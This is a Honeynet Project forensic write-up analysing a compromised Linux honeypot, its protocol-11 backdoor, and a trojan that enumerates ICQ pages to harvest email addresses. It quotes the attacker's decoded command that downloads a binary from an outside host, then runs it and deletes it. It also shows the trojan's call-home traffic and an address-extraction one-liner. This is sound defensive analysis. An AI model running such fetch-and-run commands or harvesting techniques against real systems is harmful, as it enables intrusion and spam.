Scan of the Month #22 of the Honeynet Project: Analysis of nefarious activity done after penetration of a Linux system.
Write up by: Javier Fernández-Sanguino Peña (jfernandez at germinus dot COM), Germinus Solutions.
First of all the MD5sum of the snort log is checked before decompressing it.
$ md5sum snort-0718\@1401.log.gz
6d0056c385f4d312f731d9506e217314
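The same integrity check can be scripted. The following is only a minimal sketch: the function names `md5_of_file` and `matches_published` are illustrative and not part of any tool used in this analysis.

```python
import hashlib


def md5_of_file(path, chunk_size=65536):
    """Return the hex MD5 digest of a file, reading it in chunks."""
    digest = hashlib.md5()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def matches_published(path, published_hex):
    """Compare the computed digest with a published one, ignoring case."""
    return md5_of_file(path) == published_hex.strip().lower()
```

For this capture it would be called as `matches_published("snort-0718@1401.log.gz", "6d0056c385f4d312f731d9506e217314")`.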
Since it matches the one given on the Honeynet page, we decompress it and first analyse it with tcpdump:
$ tcpdump -xX -r snort-0718\@1401.log
Browsing the results we see the following:
there are some ICMP packets separated by several hours.
there are some connections using IP protocol 11 (NVP).
there are also some FTP connections (together with some DNS queries).
some RPC connections are made to the compromised server too.
most of the tcpdump file consists of page downloads from web.icq.com.
We test the snort file with snort (including all attacks):
$ sudo snort -r snort-0718\@1401.log -A full -c /etc/snort.conf
Nothing much appears in the snort logs, just some warnings about ICMP messages and about some anonymous FTP accesses already noticed while browsing the file (see snort results). These seem to be unrelated to the scan of the month. Then we recreate the streams with tcpflow:
$ tcpflow -r snort-0718\@1401.log
and also dump the full snort file as text for analysis:
$ tcpdump -nxX -s 1500 -r snort-0718\@1401.log >tcpdump-full.dat
All the web pages are retrieved from web.icq.com, and they appear to be requested consecutively. Checking web.icq.com, these pages seem to hold personal information about subscribers to the instant messaging service. It is not yet clear what the attacker wants this for (or what retrieves the pages).
Ordering the tcpflow output files by size, we notice a file transfer (216 kbytes). This file transfer is the result of an HTTP request (made with lynx):
GET /foo HTTP/1.0
Host: 216.242.103.2:8882
Accept: text/html, text/plain, audio/mod, image/*, video/*, video/mpeg, application/pgp, application/pgp, application/pdf, message/partial, message/external-body, application/postscript, x-be2, application/andrew-inset, text/richtext, text/enriched
Accept: x-sun-attachment, audio-file, postscript-file, default, mail-file, sun-deskset-message, application/x-metamail-patch, text/sgml, */*;q=0.01
Accept-Encoding: gzip, compress
Accept-Language: en
User-Agent: Lynx/2.8.3dev.18 libwww-FM/2.14
Which is answered with:
HTTP/1.1.200 OK
Server: Foobarcatdog1
Content-type: text/x-csrc
Content-length: 215464
Accept-Ranges: bytes
(... file `foo' ...)
Removing the HTTP header we analyse the download:
$ file suspect-binary
suspect-binary: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
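Stripping the HTTP header from a reassembled stream can be done by cutting at the first blank line. This is a minimal sketch, assuming the stream file holds exactly one HTTP response; the function names are illustrative only.

```python
def split_http_response(stream):
    """Split a raw HTTP response into (header text, body bytes)."""
    header, separator, body = stream.partition(b"\r\n\r\n")
    if not separator:
        raise ValueError("no end-of-header marker found")
    return header.decode("latin-1"), body


def looks_like_elf(body):
    """True when the body starts with the ELF magic number."""
    return body.startswith(b"\x7fELF")
```

The body returned by `split_http_response` is what would be saved as `suspect-binary` before running `file` on it.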
Running 'strings' on it allows some (brief) analysis. The output includes the string web.icq.com, so the binary was most probably downloaded to the system and used to retrieve those HTML pages. The binary is similar to the one that was part of the forensic challenge (we will come back to this later on).
Analysing the rest of the tcpflow output, we see that the attacker is accessing the HTML pages of users at web.icq.com. The users have consecutive `Uin' values (the parameter used as the user's unique identifier), starting at 9207100 and going up to 9207199. This can be seen by analysing the requests sent by the compromised honeynet server:
$ grep ?Uin 172.016.183.002.0*
These accesses are made just after the attacker downloads the 'foo' trojan. Since the binary includes an HTTP request string with this same format, the two are obviously related. In any case, this looks a lot like user enumeration. But for what purpose? The first guess is that the attacker is trying to retrieve email addresses, which seem to be the only valuable information in the contents of the web pages:
$ cat 205.188.248.0* | perl -ne 'print $1."\n" if /mailto:([^"@\s]+@[^"\s>]+)/;' |sort -u
This returns 164 mail addresses: 88 are from ICQ (pager), 7 from AOL, and 3 from Yahoo. The rest (66) are probably valid email addresses, which is around 40% of the mail addresses retrieved.
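The extraction and the per-provider breakdown can also be sketched in a few lines. This is an illustration only: the regular expression, the category names, and the domain tests for AOL and Yahoo are assumptions, and only the pager.icq.com domain is taken from the captured data.

```python
import re
from collections import Counter

# Assumed pattern: an address ends at a quote, bracket, whitespace or '?'.
MAILTO = re.compile(r'mailto:([^"<>\s@]+@[^"<>\s?]+)', re.IGNORECASE)


def harvest(html):
    """Return the unique, lower-cased addresses found in mailto: links."""
    return sorted({address.lower() for address in MAILTO.findall(html)})


def classify(addresses):
    """Count addresses per provider category (categories are illustrative)."""
    counts = Counter()
    for address in addresses:
        domain = address.rsplit("@", 1)[1]
        if domain == "pager.icq.com":
            counts["icq pager"] += 1
        elif domain == "aol.com":
            counts["aol"] += 1
        elif domain.startswith("yahoo."):
            counts["yahoo"] += 1
        else:
            counts["other"] += 1
    return counts
```

With the figures above, the share of non-pager, non-AOL, non-Yahoo addresses is 66 / 164, which rounds to 40%.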
After this, we compile and run the packet decoder provided for the challenge. The commands appear clearly in the decoded file. To determine which packets in the snort file were decoded and which were not, we modified the program slightly. This lets us tell which packets are part of the NVP communication and which are not.
The decoded commands sent to the NVP backdoor are:
grep zone /etc/named.conf
killall -9 ttserve (twice)
killall -9 ttserve ; lynx -source http://216.242.103.2:8882/foo > /tmp/ttserve; chmod 755 /tmp/ttserve ; cd /tmp ; ./ttserve ; rm -rf /tmp/ttserve ./ttserve
killall -9 lynx ; rm -rf /tmp/ttserve (four times)
So the attacker looks for DNS information (see question 2), stops previously running processes, then uses lynx to download the trojan (called foo on the server and ttserve on the compromised system), runs it and removes it from the system.
Just to give it a try, we do some searches on Google.
The first search is for 'ttserve' (the name the attacker gives to the downloaded program 'foo'). It seems to be the handle of a notorious spammer (ttserve@tm.net.my). This ISP is listed among the top 100 spammers on Usenet (http://www.newsadmin.com/cgi-bin/newsspam1). Some more research with Google indicates that there are a lot of open relays and a lot of problems linked to these ISPs. As a matter of fact, there are spam mails as old as 1999 that use this handle.
After this we look for relevant information on the NVP backdoor. One of the first hits on Google is an analysis of the backdoor made by the SecurityFocus DeepSight Threat Management team. After reading through it, it is evident that this same backdoor is the one used in the challenge. Also note that the Honeynet Project's note on the results of the reverse challenge points to the Scans of the Month as a new step related to this compromise, so they seem to be closely related.
Just for completeness, I downloaded the top ten entries of the forensic challenge and went through them. This information sheds some more light on this challenge, since it seems that the NVP backdoor was used not just for user enumeration at web.icq.com but for many other purposes too.
The write-ups provide a good deal of useful information that is relevant to the analysis. In particular, the NVP analysis is very useful for understanding how the backdoor communicates with the attacker (which helps answer question 1) and how commands are sent to it.
In any case, after careful black-box analysis of the trojan (see below) I was ready to answer all the questions.
This question has two answers: 203.173.144.50 and 216.242.103.2. The answer depends on whether we are talking about the IP address used to command the NVP trojan or the 'foo' ('ttserve') trojan.
We must first note that the packets sent to the NVP backdoor use spoofed source IP addresses:
$ cat packets/tcpdump-full.dat |grep ip-proto-11 |grep "> 172.16" |cut -f 2 -d " " |sort -u
10.39.81.89
122.255.17.55
168.148.27.14
192.146.201.172
218.209.145.27
26.44.146.84
58.248.76.90
94.0.146.98
And the trojan answers to other addresses:
$ cat packets/tcpdump-full.dat |grep ip-proto-11 |grep "172.16.183.2 >" |cut -f 4 -d " " |sort -u
122.114.160.41
158.217.222.215
175.44.57.180
203.173.144.50
22.23.166.235
31.223.48.171
55.247.104.208
57.35.28.126
73.195.64.167
Of all these, only two trigger ICMP unreachable packets (158.217.222.215 and 175.44.57.180), so those two can be discarded. As for the other ones, it is difficult to know exactly which one is the attacker's IP address.
Checking the first protocol 11 packet sent to the compromised host, its first bytes include the following: "00 02 01 CB AD 90 32", which translates into "00 02 01 203 173 144 50". Curiously enough, this IP address is one of the addresses the answers are sent to.
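The hexadecimal-to-dotted-quad translation can be reproduced mechanically. This is a small sketch; the offset of 3 bytes is simply read off the sample quoted above and is not a documented field position, and the function name is illustrative.

```python
import ipaddress


def embedded_address(payload_hex, offset=3):
    """Decode the four bytes at `offset` of a hex dump as an IPv4 address."""
    raw = bytes.fromhex(payload_hex)
    return str(ipaddress.IPv4Address(raw[offset:offset + 4]))


print(embedded_address("00 02 01 CB AD 90 32"))  # prints 203.173.144.50
```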
After some investigation (and reading the NVP analysis done by SecurityFocus' DeepSight team) we can confirm that the first packet sent to the NVP backdoor includes the IP address that answers should be sent to. The IP address used to communicate with the NVP trojan is 203.173.144.50.
However, the IP address used to communicate with the foo trojan is 216.242.103.2. The tcpdump file shows a communication with a web server on port 8882 of the address 11.11.11.11; however, this is inconsistent with the fact that, in the connection to that web server to download 'foo', the HTTP/1.0 request includes 'Host: 216.242.103.2:8882'. Also, the binary 'foo' (as we will see later on) makes a connection to that IP address (port 53413), which is hardcoded in the binary.
Before downloading foo the attacker sends a 'grep zone /etc/named.conf'. The attacker seems to be looking for a primary (or secondary) DNS server with zones configured. The output of this command is sent to a list of servers which includes the attacker's IP address. The attacker might want to compromise a DNS server to pollute DNS records or, more probably, to add IP addresses to the name server so that it provides reverse resolution for them.
Why would he want this? If we jump a bit ahead to question 6 we can infer that the attacker is a spammer. One of the procedures used by many mail servers to (try to) reduce spam is to do reverse address resolution for the IP address connecting to them and, also, to check whether that IP address matches the fully qualified domain name given to the mail server (in the HELO or EHLO commands). So he is quite probably looking for DNS servers: if he can control one, he can probably leverage it to send even more spam by faking DNS records.
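The kind of check described above can be sketched as follows. This is a simplified model, not the logic of any particular mail server: the two dictionaries stand in for real PTR and A lookups, and all names and addresses are made-up examples.

```python
def passes_dns_checks(client_ip, helo_name, ptr_records, a_records):
    """Model of a reverse-DNS plus HELO consistency check.

    ptr_records maps an IP address to a host name (reverse zone);
    a_records maps a host name to a set of IP addresses (forward zone).
    Both are stand-ins for real DNS queries.
    """
    ptr_name = ptr_records.get(client_ip)
    if ptr_name is None:
        return False  # no reverse record at all
    if client_ip not in a_records.get(ptr_name, set()):
        return False  # reverse name does not resolve back to the client
    # The name announced in HELO/EHLO must map to the same address.
    return client_ip in a_records.get(helo_name, set())
```

Someone who controls both the forward and the reverse zone on a name server can add the records needed to make this function return True for an arbitrary address, which is why a DNS server is an attractive target here.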
The readable text is the output of the commands that the trojan executed, whereas the packets that do not include readable text (but do reveal text once decoded with the provided tool) are commands sent to the trojan. These commands are encoded so that intrusion detection tools are not triggered (as they might be if standard unix commands were sent in the clear).
Thus, packets #17-#25 are answers sent by the trojan and packets #15-#16 are commands to it.
Foo (also called 'ttserve') is a trojan that "calls home" to port 53413 at 216.242.103.2. Its purpose is to connect to a web frontend to instant messaging servers (ICQ) and retrieve, through brute-force enumeration, information on users. More specifically, the trojan has been programmed to return all the e-mail addresses found on the pages retrieved.
'Foo' is based on a state machine that works like this:
Send GU --(receives DUx)--> Start search with 'x' --> Send SE(x) and email addresses
   ^                                                                |
   |                                                                |
   +------------------------ (receives GOT) ------------------------+
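The diagram can be expressed as a small transition function. This is a sketch of the observed behaviour, not recovered code: the state names, the `harvest` callback, the layout of the "SE" report, and the handling of "DIE" in every state are assumptions.

```python
from enum import Enum, auto


class State(Enum):
    POLLING = auto()      # keeps sending "GU\n" until "DU<n>" arrives
    WAITING_ACK = auto()  # results sent, waiting for "GOT"
    STOPPED = auto()      # "DIE" received, process exits


def step(state, message, harvest):
    """Return (next_state, datagrams_to_send) for one received message.

    `harvest` is a hypothetical callable mapping the first UIN to the
    list of e-mail addresses found while enumerating the pages.
    """
    message = message.strip()
    if message == "DIE":  # assumed to be honoured in any state
        return State.STOPPED, []
    if state is State.POLLING and message.startswith("DU"):
        start = int(message[2:])
        # Assumed report layout: "SE<n>" followed by one address per line.
        report = "SE%d\n" % start + "\n".join(harvest(start))
        return State.WAITING_ACK, [report]
    if state is State.WAITING_ACK and message == "GOT":
        return State.POLLING, ["GU\n"]
    # Nothing useful received: while polling, "GU\n" is sent again.
    return state, (["GU\n"] if state is State.POLLING else [])
```

Feeding it "DU9207100" while polling, then "GOT", walks once around the loop shown in the diagram.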
Who was it programmed by? This is not an easy question, since the source code of the program is not available and disassembling it is not an easy task (the code is statically linked and stripped). There is some information, however, that can quickly answer the question:
My guess is that the programmer is an amateur. Note that this trojan (and the NVP trojan) are related to honeynet's forensic challenge, probably developed by the same person.
Run the trojan (it detaches itself and runs in the background) and then remove all traces of the trojan from the filesystem (the trojan was downloaded to /tmp).
The attacker most probably wants this information to send spam. There are two things that point in this direction:
Most probably the NVP backdoor would have been prevented and detected in the networks I build. The NVP communication from the compromised machine would have been stopped by the firewall, and the firewall would log the non-TCP packets due to its "default deny" rule (at the end of the rule chain). If the trojan were to send NVP packets continuously, they would most probably draw my attention (as I do check firewall logs from time to time). However, if (like the 'foo' trojan) it only sent a small number of packets (11) and shut itself down when unable to communicate, it might be missed. It would not, however, be detected by network-based intrusion detection systems, since it is not part of their rule base (which is a real problem with NIDS technology).
Regarding host-based intrusion detection (not network-based), I thought at first that it would be detected by TAMU's Tiger tool (of which I have recently become upstream maintainer). As of its newest release (3.0), this tool has a check for sockets opened by listening processes. I expected it to detect that there was a trojan listening on a raw socket for protocol 11. However, I tested it with a sample program (see the source file) and it did not work, so I fixed it to work (see the new check_listeningprocs script). This new script will be provided with newer versions of Tiger.
Actively monitor firewall logs for suspicious activity.
Install a host-based intrusion detection system (such as Tiger, after the changes made to the latest version) that proactively checks for processes which open ports (or put interfaces in promiscuous mode, which is also used for backdoor communication).
Properly customize intrusion detection systems to report on unknown traffic (that is, traffic "not expected" in the affected zones) and not just rely on the default rules provided for remote-based attacks.
The analysis of the 'foo' binary retrieved from the remote web server was part of the work done for the challenge. The binary is statically linked, and 'strings' shows, among others, the following string: "@(#) The Linux C library 5.3.12". Other valuable strings from the binary are the following:
"(nfsiod)"
"216.242.103.2"
"SE%lu"
"web.icq.com"
"GET /wwp?Uin=%lu HTTP/1.0"
"Host: web.icq.com"
"gethostby*.getanswer: asked for "%s", got "%s""
Note: As a matter of fact, all of these are in the rodata section of the ELF binary, which contains the constant strings and variables of the program. If we use the program hexdump we can look for this section. The beginning of it is shown below:
0002ca40 e8 cb 36 fd ff c2 00 00 28 6e 66 73 69 6f 64 29 |èË6ýÿÂ..(nfsiod)|
0002ca50 00 2f 00 32 31 36 2e 32 34 32 2e 31 30 33 2e 32 |./.216.242.103.2|
0002ca60 00 47 4f 54 00 47 55 0a 00 44 49 45 00 44 55 00 |.GOT.GU..DIE.DU.|
0002ca70 25 6c 75 00 53 45 25 6c 75 0a 00 77 65 62 2e 69 |%lu.SE%lu..web.i|
0002ca80 63 71 2e 63 6f 6d 00 47 45 54 20 2f 77 77 70 3f |cq.com.GET /wwp?|
0002ca90 55 69 6e 3d 25 6c 75 20 48 54 54 50 2f 31 2e 30 |Uin=%lu HTTP/1.0|
0002caa0 0d 0a 48 6f 73 74 3a 20 77 65 62 2e 69 63 71 2e |..Host: web.icq.|
0002cab0 63 6f 6d 0d 0a 0d 0a 00 67 65 74 68 6f 73 74 62 |com.....gethostb|
0002cac0 79 2a 2e 67 65 74 61 6e 73 77 65 72 3a 20 61 73 |y*.getanswer: as|
0002cad0 6b 65 64 20 66 6f 72 20 22 25 73 22 2c 20 67 6f |ked for "%s", go|
0002cae0 74 20 22 25 73 22 00 52 45 53 4f 4c 56 5f 48 4f |t "%s".RESOLV_HO|
0002caf0 53 54 5f 43 4f 4e 46 00 2f 65 74 63 2f 68 6f 73 |ST_CONF./etc/hos|
0002cb00 74 2e 63 6f 6e 66 00 72 00 6f 72 64 65 72 00 20 |t.conf.r.order. |
0002cb10 09 00 72 65 73 6f 6c 76 2b 3a 20 25 73 3a 20 22 |..resolv+: %s: "|
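The dump also shows why the shortest strings are easy to miss: a scan for printable runs with a minimum length of 4 (the usual default of 'strings') skips "GOT", "GU", "DIE" and "DU". The sketch below imitates such a scan on three rows copied from the dump; the function name and the exact definition of "printable" are assumptions.

```python
import re

# Rows 0002ca50 to 0002ca70 of the dump above.
SAMPLE = bytes.fromhex(
    "00 2f 00 32 31 36 2e 32 34 32 2e 31 30 33 2e 32"
    "00 47 4f 54 00 47 55 0a 00 44 49 45 00 44 55 00"
    "25 6c 75 00 53 45 25 6c 75 0a 00 77 65 62 2e 69"
)


def printable_runs(data, min_len=4):
    """Return runs of printable ASCII (plus tab) of at least min_len bytes."""
    pattern = re.compile(rb"[\x20-\x7e\t]{%d,}" % min_len)
    return [match.group().decode("ascii") for match in pattern.finditer(data)]


print(printable_runs(SAMPLE))             # the short commands are missing
print(printable_runs(SAMPLE, min_len=2))  # now GOT, GU, DIE and DU appear
```

The last entry, "web.i", is cut short only because the sample stops in the middle of "web.icq.com".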
To trace how the binary works, the tests were done on a laptop running Debian GNU/Linux 2.2 (later upgraded to 3.0), disconnected from the network. A chroot environment with the bare minimum needed to run some analysis tools (strace, ltrace and fenris) together with bash (see the chroot tree) is used. Also, the trojan is run as a regular user.
An 'strace' shows the following behavior:
The trojan starts with:
execve("./suspect-binary", ["./suspect-binary"], [/* 23 vars */]) = 0
personality(PER_LINUX) = 0
sigaction(SIGCHLD, {SIG_IGN}, {SIG_DFL}, 0x400886b8) = 0
fork() = 2171
[pid 2171] setsid() = 2171
[pid 2171] sigaction(SIGCHLD, {SIG_IGN}, {SIG_IGN}, 0x8064854) = 0
[pid 2171] setuid(1) = -1 EPERM (Operation not permitted)
[pid 2171] setreuid(65535, 1) = -1 EPERM (Operation not permitted)
[pid 2171] fork() = 2172
[pid 2172] sigaction(SIGPIPE, {SIG_IGN}, {SIG_DFL}, 0x400886b8) = 0
[pid 2172] chdir("/") = 0
[pid 2172] sigaction(SIGCHLD, {SIG_IGN}, {SIG_IGN}, 0x8064854) = 0
[pid 2172] socket(PF_INET, SOCK_DGRAM, IPPROTO_UDP) = 3
[pid 2172] fcntl(3, F_SETFL, O_RDONLY|O_NONBLOCK) = 0
[pid 2172] sendto(3, "GU\n", 3, 0, {sin_family=AF_INET, sin_port=htons(53413), sin_addr=inet_addr("216.242.103.2")}}, 16) = 3
And then keeps in a loop until an answer is received:
alarm(0) = 0
sigprocmask(SIG_SETMASK, [], NULL) = 0
recvfrom(3, 0xbfff7d94, 1000, 0, 0xbfff7d70, 0xbfff7d6c) = -1 EAGAIN (Resource temporarily unavailable)
sendto(3, "GU\n", 3, 0, {sin_family=AF_INET, sin_port=htons(53413), sin_addr=inet_addr("216.242.103.2")}}, 16) = 3
sigprocmask(SIG_BLOCK, [ALRM], []) = 0
In order to let the trojan contact its server, the IP address 216.242.103.2 was added to the network card (so that the kernel would, in fact, send the request over the loopback interface), and a simple listener was kept on that port with netcat:
$ nc -u -l -p 53413 216.242.103.2
We also ran tcpdump so that we could see which packets were being sent by the trojan:
# tcpdump -ni lo
The trojan tries to receive an answer after sending "GU". Analysing the tcpdump output of the honeynet box we are able to determine that the trojan receives the following string from the remote server: "DU9207100" and, after that, it contacts several DNS servers and then starts contacting web.icq.com.
So, we just send this to the trojan:
$ echo "DU9207100" | nc -u localhost 32774
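The manual netcat exchange can be replaced by a tiny stand-in for the attacker's server. This is a sketch under assumptions: the function name is illustrative, and the reply format "DU<n>" without a trailing newline simply mirrors the string observed in the capture.

```python
import socket


def answer_poll(sock, first_uin):
    """Wait for one datagram and answer a "GU" poll with "DU<first_uin>".

    `sock` is an already bound UDP socket. Returns the datagram received.
    """
    data, peer = sock.recvfrom(1000)
    if data.strip() == b"GU":
        sock.sendto(b"DU%d" % first_uin, peer)
    return data


# Usage sketch, with the setup described above (216.242.103.2 added locally):
#   server = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#   server.bind(("216.242.103.2", 53413))
#   answer_poll(server, 9207100)
```

Replying to the peer address of the received datagram avoids having to look up the trojan's ephemeral source port (32774 in the run above).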
After this we confirm that it tries to look up web.icq.com by querying the locally configured DNS server. Since we have no DNS server installed, we download and install 'bind', configuring it to make the trojan think it is the primary DNS server for icq.com (see the DNS configuration and the zone configuration).
open("/etc/host.conf", O_RDONLY) = -1 ENOENT (No such file or directory)
gettimeofday({1029263832, 47858}, NULL) = 0
getpid() = 2438
open("/etc/resolv.conf", O_RDONLY) = -1 ENOENT (No such file or directory)
uname({sys="Linux", node="XXXXX", ...}) = 0
socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 3
connect(3, {sin_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("0.0.0.0")}}, 16) = 0
send(3, "\342\255\1\0\0\1\0\0\0\0\0\0\3web\3icq\3com\0\0\1\0\1", 29, 0) = 29
oldselect(4, [3], NULL, NULL, {5, 0}) = 1 (in [3], left {5, 0})
recvfrom(3, "\342\255\205\200\0\1\0\1\0\1\0\1\3web\3icq\3com\0\0\1\0"..., 1024, 0, {sin_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("127.0.0.1")}}, [16]) = 78
close(3) = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 3
connect(3, {sin_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("127.0.0.1")}}, 16) = 0
Once this is done (and we repeat the previous steps), the trojan attempts to connect to our local web server, asking for the ICQ pages (as described above).
connect(3, {sin_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("127.0.0.1")}}, 16) = 0
sigprocmask(SIG_BLOCK, [ALRM], []) = 0
sigaction(SIGALRM, {0x805583c, [], 0}, {SIG_DFL}, 0x806485c) = 0
time(NULL) = 1029263832
alarm(1) = 0
sigsuspend([]--- SIGALRM (Alarm clock) ---
/proc/2438/status: No such file or directory
<... sigsuspend resumed> ) = -1 EINTR (Interrupted system call)
sigreturn() = ? (mask now [ALRM])
time(NULL) = 1029263833
sigaction(SIGALRM, {SIG_DFL}, NULL, 0x4002d319) = 0
alarm(0) = 0
sigprocmask(SIG_SETMASK, [], NULL) = 0
fcntl(3, F_SETFL, O_RDONLY|O_NONBLOCK) = 0
send(3, "GET /wwp?Uin=1 HTTP/1.0"..., 55, 0) = 55
time(NULL) = 1029263833
time(NULL) = 1029263833
ioctl(3, 0x541b, [27760]) = 0
read(3, "H", 1) = 1
time(NULL) = 1029263833
ioctl(3, 0x541b, [27759]) = 0
read(3, "T", 1) = 1
time(NULL) = 1029263833
ioctl(3, 0x541b, [27758]) = 0
read(3, "T", 1) = 1
time(NULL) = 1029263833
ioctl(3, 0x541b, [27757]) = 0
read(3, "P", 1) = 1
time(NULL) = 1029263833
The behaviour observed is consistent with the snort file output from the honeynet. Looking carefully in the binary around the "DU" string, we see three more strings which look like commands for the trojan: "SE" (with a parameter), "DIE" and "GOT". Since they are short strings, only the first one shows up in the 'strings' output. We test each one of them while stracing the daemon to see its behaviour:
recvfrom(3, "DIE\n", 1000, 0, {sin_family=AF_INET, sin_port=htons(32782), sin_addr=inet_addr("127.0.0.1")}}, [16]) = 4
close(3) = 0
_exit(0) = ?
After some analysis and tests we can determine the trojan's state machine (as described previously in Question 4)
Send GU --(receives DUx)--> Start search with 'x' --> Send SE(x) and email addresses
   ^                                                                |
   |                                                                |
   +------------------------ (receives GOT) ------------------------+
We try also some stress tests to see if the program suffers from overflows:
$ perl -e "print \"DU\".\"a\"x1000000" |nc -u localhost 32790
$ perl -e "print \"DU\".\"9\"x1000000" |nc -u localhost 32790
In the first case the trojan only tries to contact web.icq.com once, asking for Uin=0. In the second case it will only try to contact once asking for Uin=4294967295.
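Both results are what a conversion in the style of strtoul(3) on a 32-bit system would give: 0 when no digits are found, and the maximum unsigned value on overflow. Whether the trojan really calls strtoul is an inference from this behaviour, not something confirmed by disassembly. The sketch below models only that observed behaviour; it ignores the leading whitespace and sign handling that the real function has.

```python
ULONG_MAX_32 = 0xFFFFFFFF  # 4294967295 on a 32-bit system


def parse_start_uin(command):
    """Model the number parsing observed for "DU<digits>" commands."""
    if not command.startswith("DU"):
        raise ValueError("not a DU command")
    value = 0
    for char in command[2:]:
        if char not in "0123456789":
            break  # stop at the first non-digit
        # Saturate instead of wrapping, as strtoul does on overflow.
        value = min(value * 10 + int(char), ULONG_MAX_32)
    return value


print(parse_start_uin("DU" + "a" * 1000))  # prints 0
print(parse_start_uin("DU" + "9" * 1000))  # prints 4294967295
```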
After these tests, we add a web server, using one of the HTML answers from the tcpdump file. Since the request is "GET /wwp?Uin=XXXX" (XXXX being the ICQ id it tries to retrieve), we just copy the file to Apache's root directory, naming it 'wwp', and set the default Content-Type to text/html.
A test with the overflow case shows that the trojan will send back to the server:
SE4294967295 9207197@pager.icq.com
If we use any number, it will go off and check 101 pages, and then return all the mail addresses it has retrieved from the pages to the remote 53413 port.
Note: I also attempted some reverse engineering with fenris but it was not conclusive since the program could not be traced easily using:
$ fenris -L ~/fenris-0.2/support/fn-libc5.dat -s -o fenris ./suspect-binary
Disassembling the program could answer many of the questions, but since the black-box analysis has already answered most of them it was not really worth the effort. However, the information (and programs) available as part of the answers to the reverse challenge would be sufficient to decompile the binary.